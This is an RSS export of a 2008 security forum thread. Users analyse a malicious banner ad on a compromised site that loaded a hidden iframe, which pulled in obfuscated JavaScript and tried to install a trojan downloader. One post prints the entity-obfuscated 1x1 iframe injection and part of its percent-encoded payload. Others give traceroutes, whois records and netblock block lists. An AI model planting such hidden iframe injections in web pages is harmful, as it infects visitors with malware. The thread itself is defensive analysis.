<?xml version="1.0" encoding="UTF-8"?>

<rss version="2.0" xmlns:blogChannel="http://backend.userland.com/blogChannelModule">

<channel>
<title>Re: Does anyone know anything about this advert? in Security</title>
<link>http://www.dslreports.com/forum/r20340483</link>
<description></description>
<language>en</language>
<pubDate>Thu, 03 Dec 2009 04:06:27 EDT</pubDate>
<lastBuildDate>Thu, 03 Dec 2009 04:06:27 EDT</lastBuildDate>

<item>
<title>Re: Does anyone know anything about this advert?</title>
<link>http://www.dslreports.com/forum/remark,20346955</link>
<description><![CDATA[<A HREF="/useremail/u/548172"><b>foxsteve</b></A> : ISP SONIC has no any problem<br>C:\....>tracert 85.255.121.195<br><br>Tracing route to 85.255.121.195 over a maximum of 30 hops<br>.... .....................................<br><br>  4    16 ms    53 ms    16 ms  200.ge-1-2-0.gw2.equinix-sj.sonic.net [64.142.0.210]<br>  5    19 ms    17 ms    17 ms  sjc-c00-pni-gbe-1-5-6.wvfiber.net [206.223.116.18]<br>  6    17 ms    17 ms    19 ms  66.186.192.250<br>  7    19 ms    17 ms    19 ms  gw1.cernel.net [64.28.176.1]<br>  8     *        *        *     Request timed out.<br>  9     *        *        *     Request timed out.<br> 10     *        *        *     Request timed out.<br> 11     *        *        *     Request timed out.<br> 12     *       28 ms    28 ms  85.255.121.195<br><br>Trace complete.]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20346955</guid>
<pubDate>Wed, 16 Apr 2008 23:26:38 EDT</pubDate>
</item>

<item>
<title>Re: Does anyone know anything about this advert?</title>
<link>http://www.dslreports.com/forum/remark,20346951</link>
<description><![CDATA[<A HREF="/useremail/u/548172"><b>foxsteve</b></A> : Error]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20346951</guid>
<pubDate>Wed, 16 Apr 2008 23:26:07 EDT</pubDate>
</item>

<item>
<title>Re: Does anyone know anything about this advert?</title>
<link>http://www.dslreports.com/forum/remark,20342732</link>
<description><![CDATA[<A HREF="/useremail/u/1350120"><b>Graycode</b></A> : My ISP, Cox, has apparently encountered them before.<br><pre><br>Tracing route to 85.255.121.195 over a maximum of 30 hops<br>...<br>  4    13 ms     9 ms     9 ms  68.12.9.85<br>  5    18 ms    13 ms    16 ms  68.12.14.58<br>  6    15 ms    12 ms    13 ms  68.12.14.33<br>  7    40 ms    38 ms    38 ms  68.1.1.121<br>  8  68.1.18.28  reports: Destination net unreachable.<br> <br>Trace complete.</pre><br>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20342732</guid>
<pubDate>Wed, 16 Apr 2008 11:01:23 EDT</pubDate>
</item>

<item>
<title>Re: Does anyone know anything about this advert?</title>
<link>http://www.dslreports.com/forum/remark,20342478</link>
<description><![CDATA[<A HREF="/useremail/u/655093"><b>Name Game</b></A> : <div class="bquote"><small>said by  newview <A HREF="/useremail/u/486895"><IMG SRC="http://i.dslr.net/bb/profile.gif" ALT="See Profile" BORDER=0 WIDTH=16 HEIGHT=11></A> :</small><br><br>    <blockquote><small>quote:</small><hr>I hate block lists... maybe because I have been on the 'wrong end' of them in the past. But after careful consideration, we do recommend blocking traffic from these two netblocks:<br><br>InterCage Inc.: 69.50.160.0/19 (69.50.160.0 - 69.50.191.255)<br><b>Inhoster: 85.255.112.0/20 (85.255.112.0 - 85.255.127.255)</b><hr></blockquote><br><br>&raquo;<A HREF="http://isc.sans.org/diary.html?storyid=997" >isc.sans.org/diary.html?storyid=997</A><br> </div>When I go online or search I always get a porn/spam advertising site like Jupk.com!<br>Known Advertising Sites<br>www.jupk.com<br>www.ipodderx.comPossible Hostile<br><br>I have seen this happen when you type an address straight into the address bar including for www.google.co.uk and www.bbc.co.uk.<br><br>Currently known advertising websites are www.jupk.com and www.ipodderx.com but there are likely to be many more. Please contact me if you know of one. <br><br><b>The solution</b> <br>Note: I still haven't discoved what causes the hijack in the first place. If you know please contact me. <br>First find your DNS settings<br>Here is how you do this in Microsoft Windows XP or 2000 <br><br>Go to Windows Control Panel <br>Go to the 'Network Connections' (or 'Network and Internet Connections' then 'Network Connections') section. <br>Find the item in this window that is your connection to the internet and double click it. <br>If you connect though BT this may be 'BT Broadband' <br>If you connect though a network it may be 'Local Area Connection' <br>On the 'General' tab of the window that appears scroll down until you see the 'Internet Protocol' item and double click it. <br>On the 'General' tab of the window that appears check which of the following is selected. <br>Obtain DNS server address automatically <br>Use the following DNS server addresses <br>Next check the Settings are OK <br>If it is the latter make a note of the two sets of numbers and search for them in the list on the right of this page. E.g. a known bad server is 85.255.113.194 <br>If you find then in the list delete the numbers and change the setting to 'Obtain DNS server address automatically'. <br>If you don't find them in the list this may still be the problem so email the numbers to us using the contact form below and then change the setting to 'Obtain DNS server address automatically'. <br>Contact Me <br>Please use this form to contact me. <br><br>(20th April 2007) I'm being overwhelmed by emails about this so please now use the new forum <br><br><b>Inhoster Addresses<br>85.255.112.0<br>through..<br>85.255.127.255</b><br><br>Solve This Problem<br>Report New Site or Report New DNS or Report Root Cause <br>If when you use your web browser you keep on getting a site that looks like the image below your DNS settings have been hijacked and using a server at an Ukrainian company called Inhoster.<br><br>&raquo;<A HREF="http://gabrielharrison.co.uk/consultancy/dns_spam_porn_search_hijack/" >gabrielharrison.co.uk/consultanc&middot;&middot;&middot;_hijack/</A><br><small>--<br>Gladiator Security Forum  &raquo;<A HREF="http://www.gladiator-antivirus.com/" >www.gladiator-antivirus.com/</A> <br>*<br>A fun/friendly/informative forum for the mature elder crowd<br>  &raquo;<A HREF="http://www.theover50goldengroup.net" >www.theover50goldengroup.net</A><br></small>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20342478</guid>
<pubDate>Wed, 16 Apr 2008 10:09:25 EDT</pubDate>
</item>

<item>
<title>Re: Does anyone know anything about this advert?</title>
<link>http://www.dslreports.com/forum/remark,20341569</link>
<description><![CDATA[<A HREF="/useremail/u/548172"><b>foxsteve</b></A> : Requesting &raquo;<A HREF="http://85.255.121.195" >85.255.121.195</A> .. Ok<br>Reply received (reply time: 1782 ms)<br>------------------------------------<br>HTTP/1.1 200 OK<br>Date: Wed, 16 Apr 2008 16:21:17 GMT<br>Server: Apache/2.2.6 (Debian) PHP/5.2.4-2 with Suhosin-Patch<br>X-Powered-By: PHP/5.2.4-2<br>Content-Length: 0<br>Connection: close<br>Content-Type: text/html]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20341569</guid>
<pubDate>Wed, 16 Apr 2008 01:24:00 EDT</pubDate>
</item>

<item>
<title>Re: Does anyone know anything about this advert?</title>
<link>http://www.dslreports.com/forum/remark,20341539</link>
<description><![CDATA[<A HREF="/useremail/u/486895"><b>newview</b></A> :  <blockquote><small>quote:</small><hr>I hate block lists... maybe because I have been on the 'wrong end' of them in the past. But after careful consideration, we do recommend blocking traffic from these two netblocks:<br><br>InterCage Inc.: 69.50.160.0/19 (69.50.160.0 - 69.50.191.255)<br><b>Inhoster: 85.255.112.0/20 (85.255.112.0 - 85.255.127.255)</b><hr></blockquote><br>&raquo;<A HREF="http://isc.sans.org/diary.html?storyid=997" >isc.sans.org/diary.html?storyid=997</A><br><small>--<br> <br>&Ouml;&iquest;&Ouml;<br><A HREF="http://tinyurl.com/525xl">The Rules of Spam</a> | <A HREF="http://www.spamlaws.com/state/md.html">Maryland's <i>Newest</i> Anti-Spam Law</a><br>Where are we going? And what's with the hand basket?</small>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20341539</guid>
<pubDate>Wed, 16 Apr 2008 01:08:25 EDT</pubDate>
</item>

<item>
<title>Re: Does anyone know anything about this advert?</title>
<link>http://www.dslreports.com/forum/remark,20341523</link>
<description><![CDATA[<A HREF="/useremail/u/548172"><b>foxsteve</b></A> : Information related to '85.255.112.0 - 85.255.127.255'<br><br>inetnum:        85.255.112.0 - 85.255.127.255<br>org-name:       UkrTeleGroup Ltd.<br>address:        UkrTeleGroup Ltd.<br>                Mechnikova 58/5<br>                65029 Odessa<br>                Ukraine<br>person:         Andrew Sotov<br>abuse-mailbox:   mailto:abuse@ukrtelegroup.com.ua<br>phone:          +380631508855]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20341523</guid>
<pubDate>Wed, 16 Apr 2008 01:02:40 EDT</pubDate>
</item>

<item>
<title>Re: Does anyone know anything about this advert?</title>
<link>http://www.dslreports.com/forum/remark,20341522</link>
<description><![CDATA[<A HREF="/useremail/u/1350120"><b>Graycode</b></A> : <div class="bquote"><small>said by  foxsteve <A HREF="/useremail/u/548172"><IMG SRC="http://i.dslr.net/bb/profile.gif" ALT="See Profile" BORDER=0 WIDTH=16 HEIGHT=11></A>  :</small><br><br>cdpuvbhfzz.com has address 85.255.121.195<br>Found 4 websites with the IP 85.255.121.195<br><br>1) aarmrgdxrv.com<br>2) acdedblshd.com<br>3) adtctqypoa.com<br>4) xabmiphabh.cn<br> </div><strike>That IP may have been taken off line,</strike> I can't seem to connect to it.<br><br>Edit: It seems my ISP is blocking access to that IP.]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20341522</guid>
<pubDate>Wed, 16 Apr 2008 01:01:56 EDT</pubDate>
</item>

<item>
<title>Re: Does anyone know anything about this advert?</title>
<link>http://www.dslreports.com/forum/remark,20341515</link>
<description><![CDATA[<A HREF="/useremail/u/486895"><b>newview</b></A> : <div class="bquote"><small>said by  nwrickert <A HREF="/useremail/u/1070900"><IMG SRC="http://i.dslr.net/bb/profile.gif" ALT="See Profile" BORDER=0 WIDTH=16 HEIGHT=11></A> :</small><br><br>I don't currently have a good tool for handling that obfuscated javascript, though.<br> </div> <br>If you're looking for a good "de-obfuscator", <A HREF="http://www.netdemon.net/decode.html">Net Demon</a> does the trick.<br><small>--<br> <br>&Ouml;&iquest;&Ouml;<br><A HREF="http://tinyurl.com/525xl">The Rules of Spam</a> | <A HREF="http://www.spamlaws.com/state/md.html">Maryland's <i>Newest</i> Anti-Spam Law</a><br>Where are we going? And what's with the hand basket?</small>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20341515</guid>
<pubDate>Wed, 16 Apr 2008 00:58:48 EDT</pubDate>
</item>

<item>
<title>Re: Does anyone know anything about this advert?</title>
<link>http://www.dslreports.com/forum/remark,20341498</link>
<description><![CDATA[<A HREF="/useremail/u/1070900"><b>nwrickert</b></A> : Probably controlled by RBN, with domain registrations paid using stolen credit cards.]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20341498</guid>
<pubDate>Wed, 16 Apr 2008 00:52:25 EDT</pubDate>
</item>

<item>
<title>Re: Does anyone know anything about this advert?</title>
<link>http://www.dslreports.com/forum/remark,20341489</link>
<description><![CDATA[<A HREF="/useremail/u/548172"><b>foxsteve</b></A> : cdpuvbhfzz.com has address 85.255.121.195<br>Found 4 websites with the IP 85.255.121.195<br><br>1) aarmrgdxrv.com<br>2) acdedblshd.com<br>3) adtctqypoa.com<br>4) xabmiphabh.cn]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20341489</guid>
<pubDate>Wed, 16 Apr 2008 00:48:35 EDT</pubDate>
</item>

<item>
<title>Re: Does anyone know anything about this advert?</title>
<link>http://www.dslreports.com/forum/remark,20341462</link>
<description><![CDATA[<A HREF="/useremail/u/655093"><b>Name Game</b></A> : foulu<br>Contributor<br>Coppermine frequent<br>--------------------------------------------------------------------------------<br>Hi,<br><br>I make a php file that can sanitize the addition data from php & html file that infected with iframe things. I create it to use on one of my working site but I think release it will help more people. The script is simple, just check current folder and all sub folder for .php & .html, loop to find infect string in those files and then remove it. Anyway, use it with own will, I will not take any responsibility if you damage your site when using it.<br><br>I attach the file with this post, download and rename it to cure.php, upload to your site & run it. <br><br>------------------------------------------------------------<br> cure.txt (2.48 KB - downloaded 81 times.) <br> <br><br>http://forum.coppermine-gallery.net/index.php/topic,51671.180.html<br><br>also there...<br>A little shell (/bin/sh) script to clean up that... Not better than capecodgal's one but very simple to use if you have shell access or /bin/sh cgi capabilities.<br><br>Use it on your web's root. <br><br>------------------------------------------------------------<br> nettoie_cpg.txt (0.37 KB - downloaded 32 times.) <br> <br><br><small>--<br>Gladiator Security Forum  http://www.gladiator-antivirus.com/ <br>*<br>A fun/friendly/informative forum for the mature elder crowd<br>  http://www.theover50goldengroup.net<br></small><div class="borderless"><TABLE WIDTH=95% align=center border=0 CELLPADDING=4"><TR><TD ALIGN=CENTER VALIGN=CENTER BGCOLOR=#000000 nwrap WIDTH=33%><A HREF="/r0/download/1297979~dc6d1f6321be4c6521bc44c9da1ff2a8/cure.txt"><IMG  align=absmiddle TITLE="download" SRC="http://i.dslr.net/silk/arrow_down.png" border=0 width=16 height=16><IMG SRC="http://i.dslr.net/1ptrans.gif" WIDTH=10 HEIGHT=1 border=0><big>cure.txt</big></A> <small>2,615 bytes</small></TD></TABLE></div>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20341462</guid>
<pubDate>Wed, 16 Apr 2008 00:43:40 EDT</pubDate>
</item>

<item>
<title>Re: Does anyone know anything about this advert?</title>
<link>http://www.dslreports.com/forum/remark,20341432</link>
<description><![CDATA[<A HREF="/useremail/u/390227"><b>TechSponge</b></A> : BTW - I never got to click on anything on the site...i had the time to visually search for NY and NJ as served areas...and the fireworks just began.]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20341432</guid>
<pubDate>Wed, 16 Apr 2008 00:38:25 EDT</pubDate>
</item>

<item>
<title>Re: Does anyone know anything about this advert?</title>
<link>http://www.dslreports.com/forum/remark,20341431</link>
<description><![CDATA[<A HREF="/useremail/u/418397"><b>Lanik</b></A> : <div class="bquote"><small>said by  TechSponge <A HREF="/useremail/u/390227"><IMG SRC="http://i.dslr.net/bb/profile.gif" ALT="See Profile" BORDER=0 WIDTH=16 HEIGHT=11></A> :</small><br><br>Hey Folks!  Im the idiot that clicked on the cool looking Banner.  <br> </div>Sh!t happens, we've all made that mistake at one point or another.  What's more important is how you proceed from there mainly and what lessons were learned during this exercise in patience. :)<br><small>--<br>"If it ain't broke don't fix it."</small>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20341431</guid>
<pubDate>Wed, 16 Apr 2008 00:38:24 EDT</pubDate>
</item>

<item>
<title>Re: Does anyone know anything about this advert?</title>
<link>http://www.dslreports.com/forum/remark,20341413</link>
<description><![CDATA[<A HREF="/useremail/u/390227"><b>TechSponge</b></A> : Hey Folks!  Im the idiot that clicked on the cool looking Banner.  I never click on Banners unless Im on legit sites.  Thought that was safe.  Guess not.<br>So...got back to the city to work on this PC to get it running for tomorrow.<br>Info: I was running spybot s&d fully patched and teatimer running.  Spywareblaster installed but not "active".  Symantec Corp 10, fully patched.<br>It created 2 folder in PROGRAM FILES.  Netproject & Helper.  3 BHO's were added according to hijackthis. 2 were pointing to ieservicegate(IE Anti-Spyware - {9034a523-d068-4be8-a284-9df278be776e} - &raquo;<A HREF="http://www.ieservicegate.com/redire{...}" >www.ieservicegate.com/redire{...}</A>  + Extra button: (no name) - {9034a523-d068-4be8-a284-9df278be776e} - &raquo;<A HREF="http://www.ieservicegate.com/redire{...}" >www.ieservicegate.com/redire{...}</A>)   and 1 to netproject (sbmdl.dll).<br>There were a bunch of items caught by Spybot: Zlob, Smitfraud, Spylocked, win32 renos, and a few others.<br>As I type this, even though i would say ive done a good job cleaning...i get a few warnings from symantec in my temp ie content files for trojans (mediatubecodec[1].exe) and spybot is blocking...something.<br>Looks like the wipe begins.  Thanks to all for all of your input.  All of this is above my head.  Im just a simple network guy.<br>-Sponge]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20341413</guid>
<pubDate>Wed, 16 Apr 2008 00:34:43 EDT</pubDate>
</item>

<item>
<title>Re: Does anyone know anything about this advert?</title>
<link>http://www.dslreports.com/forum/remark,20341334</link>
<description><![CDATA[<A HREF="/useremail/u/1295721"><b>mysec</b></A> : Using the link  nwrickert <A HREF="/useremail/u/1070900"><IMG SRC="http://i.dslr.net/bb/profile.gif" ALT="See Profile" BORDER=0 WIDTH=16 HEIGHT=11></A> gives, here is the exploit in action.<br><br>As the page loads, the iframe connects in the background to cdpuvbhfzz.com (see IE status bar) and almost immediately an IE error box appears:<br><br> <IMG SRC="http://www.urs2.net/rsj/computing/imgs/load_1.gif"> <br>____________________________________________________________<br><br>Meanwhile  adv598.html caches:<br><br> <IMG SRC="http://www.urs2.net/rsj/computing/imgs/load_2.gif"> <br>____________________________________________________________<br><br>As soon as the user clicks to close the IE error box, the IE window closes, a new IE Blank window opens and the obfuscated code attempts to download loadadv598.exe in the background:<br><br> <IMG SRC="http://www.urs2.net/rsj/computing/imgs/load_3.gif"> <br>____________________________________________________________<br><br>The following file also caches, and the CLSID is one of several vulnerable ActiveX exploits <br>used in the past, but I didn't follow through to check it more.<br><br> <IMG SRC="http://www.urs2.net/rsj/computing/imgs/load_4.gif"> <br>____________________________________________________________<br><br><b>Conclusion</b><br><br>Lots of fancy footwork attempting to accomplish the same old thing: sneak in a trojan downloader, <br>easily prevented with proper security. <br><br>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20341334</guid>
<pubDate>Wed, 16 Apr 2008 00:14:32 EDT</pubDate>
</item>

<item>
<title>Re: Does anyone know anything about this advert?</title>
<link>http://www.dslreports.com/forum/remark,20341323</link>
<description><![CDATA[<A HREF="/useremail/u/655093"><b>Name Game</b></A> : Someone has Redirected my Site to cdpuvbhfzz.com-What do I do? <br><br>&raquo;<A HREF="http://forum.coppermine-gallery.net/index.php/topic,51671.0.html" >forum.coppermine-gallery.net/ind&middot;&middot;&middot;1.0.html</A>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20341323</guid>
<pubDate>Wed, 16 Apr 2008 00:12:16 EDT</pubDate>
</item>

<item>
<title>Re: Does anyone know anything about this advert?</title>
<link>http://www.dslreports.com/forum/remark,20341312</link>
<description><![CDATA[<A HREF="/useremail/u/1319807"><b>rick752</b></A> : I think I have this blocked now. Thanx.<br>That really sucks :(]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20341312</guid>
<pubDate>Wed, 16 Apr 2008 00:10:17 EDT</pubDate>
</item>

<item>
<title>Re: Does anyone know anything about this advert?</title>
<link>http://www.dslreports.com/forum/remark,20341301</link>
<description><![CDATA[<A HREF="/useremail/u/668609"><b>EGeezer</b></A> : And more here - <br><br>&raquo;<A HREF="http://www.google.com/search?q=adv598.php" >www.google.com/search?q=adv598.php</A><br>Mayors of New York come from nowhere and go nowhere.<br>Wallace Sayre (apparently, so do governors... )</small>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20341301</guid>
<pubDate>Wed, 16 Apr 2008 00:06:25 EDT</pubDate>
</item>

<item>
<title>Re: Does anyone know anything about this advert?</title>
<link>http://www.dslreports.com/forum/remark,20341296</link>
<description><![CDATA[<A HREF="/useremail/u/655093"><b>Name Game</b></A> : <div class="bquote"><small>said by  rick752 <A HREF="/useremail/u/1319807"><IMG SRC="http://i.dslr.net/bb/profile.gif" ALT="See Profile" BORDER=0 WIDTH=16 HEIGHT=11></A> :</small><br><br>Thanx, Name Game ... that was the 2nd verification that I was looking for.<br>Changing filter in ABP EasyList now. :)<br> </div>What a nasty piece of work that stuff is..good luck Rick.]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20341296</guid>
<pubDate>Wed, 16 Apr 2008 00:03:42 EDT</pubDate>
</item>

<item>
<title>Re: Does anyone know anything about this advert?</title>
<link>http://www.dslreports.com/forum/remark,20341272</link>
<description><![CDATA[<A HREF="/useremail/u/1319807"><b>rick752</b></A> : Thanx, Name Game ... that was the 2nd verification that I was looking for.<br>Changing filter in ABP EasyList now. :)]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20341272</guid>
<pubDate>Tue, 15 Apr 2008 23:59:11 EDT</pubDate>
</item>

<item>
<title>Re: Does anyone know anything about this advert?</title>
<link>http://www.dslreports.com/forum/remark,20341248</link>
<description><![CDATA[<A HREF="/useremail/u/655093"><b>Name Game</b></A> : Discussions > Troubleshooting & Implementation Questions > Script appears to be running from GoogleADs <br>(But it is not..see here)<br>&raquo;<A HREF="http://groups.google.com/group/adsense-help-troubleshooting/browse_thread/thread/0f86f6c5ba482d55/27b66790e33c5554?lnk=raot" >groups.google.com/group/adsense-&middot;&middot;&middot;lnk=raot</A><br><br>&raquo;<A HREF="http://forum.coppermine-gallery.net/index.php?topic=51680.msg250236" >forum.coppermine-gallery.net/ind&middot;&middot;&middot;sg250236</A><br><br>see also<br>Malicious site? or hacked site? <br><br>traffdollars.biz/dl/adv598.php<br><br>&raquo;<A HREF="http://spywarehunt.blogspot.com/" >spywarehunt.blogspot.com/</A><br><small>--<br>Gladiator Security Forum  &raquo;<A HREF="http://www.gladiator-antivirus.com/" >www.gladiator-antivirus.com/</A> <br>*<br>A fun/friendly/informative forum for the mature elder crowd<br>  &raquo;<A HREF="http://www.theover50goldengroup.net" >www.theover50goldengroup.net</A><br></small>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20341248</guid>
<pubDate>Tue, 15 Apr 2008 23:55:54 EDT</pubDate>
</item>

<item>
<title>Re: Does anyone know anything about this advert?</title>
<link>http://www.dslreports.com/forum/remark,20341230</link>
<description><![CDATA[<A HREF="/useremail/u/668609"><b>EGeezer</b></A> : I think I might have loaded Google's link instead - Such a dummy I am!! My GET of the actual link only yielded an apache page .  <br><small>--<br>Mayors of New York come from nowhere and go nowhere.<br>Wallace Sayre (apparently, so do governors... )</small>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20341230</guid>
<pubDate>Tue, 15 Apr 2008 23:52:37 EDT</pubDate>
</item>

<item>
<title>Re: Does anyone know anything about this advert?</title>
<link>http://www.dslreports.com/forum/remark,20341221</link>
<description><![CDATA[<A HREF="/useremail/u/1521821"><b>LoneWolf</b></A> : Another good reason to have an ad blocker.<br>In my case AdMuncher.<br>Can't click on what I can't see.  :D]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20341221</guid>
<pubDate>Tue, 15 Apr 2008 23:49:35 EDT</pubDate>
</item>

<item>
<title>Re: Does anyone know anything about this advert?</title>
<link>http://www.dslreports.com/forum/remark,20341220</link>
<description><![CDATA[<A HREF="/useremail/u/1319807"><b>rick752</b></A> : I just added:<br>*cdpuvbhfzz.com*<br>.. to the 'Malicious code' area of the EasyList subscription for Adblock Plus.<br><br>That took care of the current malicious 3rd-party frame there. That frame is still present on Eskimo.com.<br><br>We'll have to see how this manifests itself again in another instance to try to zero in on it.<br><small>--<br><A HREF="http://easylist.adblockplus.org">EasyList, EasyElement, & ABP Tracking Filter Subscriptions for Adblock Plus</a></small>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20341220</guid>
<pubDate>Tue, 15 Apr 2008 23:49:33 EDT</pubDate>
</item>

<item>
<title>Re: Does anyone know anything about this advert?</title>
<link>http://www.dslreports.com/forum/remark,20341216</link>
<description><![CDATA[<A HREF="/useremail/u/1070900"><b>nwrickert</b></A> : Not sure.<br><br>I checked the stopbadware.org site for www.eskimo.com/dsl/ but it isn't listed.  Other parts of eskimo.com are listed, but not the one that was used here.<br><br>I'm not seeing any warning if I try reloading the original link.]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20341216</guid>
<pubDate>Tue, 15 Apr 2008 23:48:34 EDT</pubDate>
</item>

<item>
<title>Re: Does anyone know anything about this advert?</title>
<link>http://www.dslreports.com/forum/remark,20341076</link>
<description><![CDATA[<A HREF="/useremail/u/668609"><b>EGeezer</b></A> : I also see that the adv.php page seems to have a malware warning from stopbadware.org - is that a recent development? <br><br>This site is currently (as of 04/15/2008) being reported to StopBadware by the following partners:Google</b>: reported <i>bad</i> </div> </div>      <br><br><small>--<br>Mayors of New York come from nowhere and go nowhere.<br>Wallace Sayre (apparently, so do governors... )</small>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20341076</guid>
<pubDate>Tue, 15 Apr 2008 23:19:22 EDT</pubDate>
</item>

<item>
<title>Re: Does anyone know anything about this advert?</title>
<link>http://www.dslreports.com/forum/remark,20341013</link>
<description><![CDATA[<A HREF="/useremail/u/1070900"><b>nwrickert</b></A> : yes it does<br><br>I used "lynx -dump" to decode it, before I posted the target link in an earlier post in this thread.  That's quicker than trying to do it manually.<br><br>I don't currently have a good tool for handling that obfuscated javascript, though.]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20341013</guid>
<pubDate>Tue, 15 Apr 2008 23:03:14 EDT</pubDate>
</item>

<item>
<title>Re: Does anyone know anything about this advert?</title>
<link>http://www.dslreports.com/forum/remark,20341007</link>
<description><![CDATA[<A HREF="/useremail/u/668609"><b>EGeezer</b></A> : looks like the code in that line directs the user to the aforementiond website's directory: /dl/adv598.php <br><small>--<br>Mayors of New York come from nowhere and go nowhere.<br>Wallace Sayre (apparently, so do governors... )</small>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20341007</guid>
<pubDate>Tue, 15 Apr 2008 23:02:45 EDT</pubDate>
</item>

<item>
<title>Re: Does anyone know anything about this advert?</title>
<link>http://www.dslreports.com/forum/remark,20340954</link>
<description><![CDATA[<A HREF="/useremail/u/1070900"><b>nwrickert</b></A> : Here is the iframe definition near the bottom of the eskimo.com page:<br><textarea name="code" class="text" cols=50 rows=10>&lt;iframe src="&amp;#104;&amp;#116;&amp;#116;&amp;#112;&amp;#58;&amp;#47;&amp;#47;&amp;#99;&amp;#100;&amp;#112;&amp;#117;&amp;#118;&amp;#98;&amp;#104;&amp;#102;&amp;#122;&amp;#122;&amp;#46;&amp;#99;&amp;#111;&amp;#109;&amp;#47;&amp;#100;&amp;#108;&amp;#47;&amp;#97;&amp;#100;&amp;#118;&amp;#53;&amp;#57;&amp;#56;&amp;#46;&amp;#112;&amp;#104;&amp;#112;" width=1 height=1&gt;&lt;/iframe&gt;&#012;</textarea><!--end code block-->Anything obfuscated that way looks suspicious to me.<br><br>the content of the iframe has "unescape('%19%04%3C9%0E%60wL0" and that percent encoding goes on for most of the javascript (around 23000 bytes).  Clearly somebody was hiding something.<br><br>I fetched those pages with "wget", so have local copies.<br><br>I later tried loading the page in XP with firefox, scripting turned on, but a limited user account.  Nothing bad happened.  This probably requires IE on an admin account before it can do anything bad.<br><br>Yet another reason to use a limited user account, to use firefox, to use the noscript extension.<br><br><small>--<br>AT&T dsl; Westell 327w modem/router; SuSE 10.1; firefox 2.0.0.13</small>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20340954</guid>
<pubDate>Tue, 15 Apr 2008 22:53:26 EDT</pubDate>
</item>

<item>
<title>Re: Does anyone know anything about this advert?</title>
<link>http://www.dslreports.com/forum/remark,20340843</link>
<description><![CDATA[<A HREF="/useremail/u/1531837"><b>Its a Secret</b></A> : ZA has ad block which I've used without regret. This is only one more reason...<br><small>--<br>A triple espresso, please...</small>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20340843</guid>
<pubDate>Tue, 15 Apr 2008 22:33:28 EDT</pubDate>
</item>

<item>
<title>Re: Does anyone know anything about this advert?</title>
<link>http://www.dslreports.com/forum/remark,20340794</link>
<description><![CDATA[<A HREF="/useremail/u/251107"><b>nil</b></A> : It's definitely a php-based exploit, but not targeting all open source php apps (that I can tell so far), so probably looking for some specific code problem.  An analysis of the source and libraries used by the known targets would probably narrow it down.. <br><small>--<br>Life is too short to be <A HREF="http://www.unix-girl.com/blog/">boring</a></small>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20340794</guid>
<pubDate>Tue, 15 Apr 2008 22:25:08 EDT</pubDate>
</item>

<item>
<title>Re: Does anyone know anything about this advert?</title>
<link>http://www.dslreports.com/forum/remark,20340781</link>
<description><![CDATA[<A HREF="/useremail/u/1070900"><b>nwrickert</b></A> : I assumed that.<br><br>Unfortunately, other sites will be similarly exploited.]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20340781</guid>
<pubDate>Tue, 15 Apr 2008 22:22:16 EDT</pubDate>
</item>

<item>
<title>Re: Does anyone know anything about this advert?</title>
<link>http://www.dslreports.com/forum/remark,20340763</link>
<description><![CDATA[<A HREF="/useremail/u/251107"><b>nil</b></A> : Based on a google search, eskimo.com was exploited, not doing this on purpose. <br><small>--<br>Life is too short to be <A HREF="http://www.unix-girl.com/blog/">boring</a></small>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20340763</guid>
<pubDate>Tue, 15 Apr 2008 22:18:11 EDT</pubDate>
</item>

<item>
<title>Re: Does anyone know anything about this advert?</title>
<link>http://www.dslreports.com/forum/remark,20340754</link>
<description><![CDATA[<A HREF="/useremail/u/1070900"><b>nwrickert</b></A> : Yes, I agree there is not a lot you can do to prevent this.]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,20340754</guid>
<pubDate>Tue, 15 Apr 2008 22:16:32 EDT</pubDate>
</item>

<item>
<title>Re: Does anyone know anything about this advert?</title>
<link>http://www.dslreports.com/forum/remark,20340746</link>
